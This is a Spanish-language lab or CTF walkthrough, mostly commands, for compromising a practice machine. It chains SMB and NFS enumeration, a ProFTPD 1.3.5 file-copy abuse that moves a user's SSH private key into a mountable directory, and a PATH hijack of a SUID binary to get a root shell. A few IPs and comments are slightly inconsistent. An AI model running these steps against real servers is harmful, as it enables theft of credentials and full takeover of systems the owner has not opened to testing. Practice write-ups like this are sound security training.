nmap -A -p- -oA output 10.10.202.161 --min-rate=10000 --script=vuln --script-timeout=15 -v
Tenemos dos puertos con smb. Yo casi siempre trato de atacar puerto 80 primero pero en este caso me voy a enfocar en 139 y 445
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.202.161
smbmap -H 10.10.202.16
smbclient //10.10.202.16/anonymous -N
Podemos bajar archivos
smbget -R smb://10.10.202.161/anonymous
Vemos que esta un archivo log.txt Ahora hacemos el comando en el puerto 111 y vemos el servicio de rpcbind
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.202.161
En el puerto 21 tenemos la version ProFTPD 1.3.5
searchsploit --id ProFTPD 1.3.5
Tenemos acceso a /var entonces vamos hacer un mount
nc 10.10.202.161 21 SITE CPFR /home/kenobi/.ssh/id_rsa SITE CPTO /var/tmp/id_rsa
Movimos la llave privada de kenobi a /var/tmp
Vamos hacer un mount de /var/tmp a nuestra maquina
mkdir /mnt/kenobiNFS
mount 10.10.202.161:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
cp /mnt/kenobiNFS/tmp/id_rsa . cat id_rsa
chmod 600 id_rsa ssh -i id_rsa kenobi@10.10.202.161
Buscamos el archivo user.txt
find / -name user.txt 2>/dev/null wc -c home/kenobi/user.txt
find / -type f -perm -u=s 2>/dev/null
/usr/bin/menu
Escogemos opcion 1
echo $PATH which curl
cd /tmp echo /bin/sh > curl chmod 777 curl export PATH=/tmp:$PATH /usr/bin/menu
copiamos todo lo de bash a curl. cuando se corre /urs/bin/menu en verdad estamos corriendo bash y no curl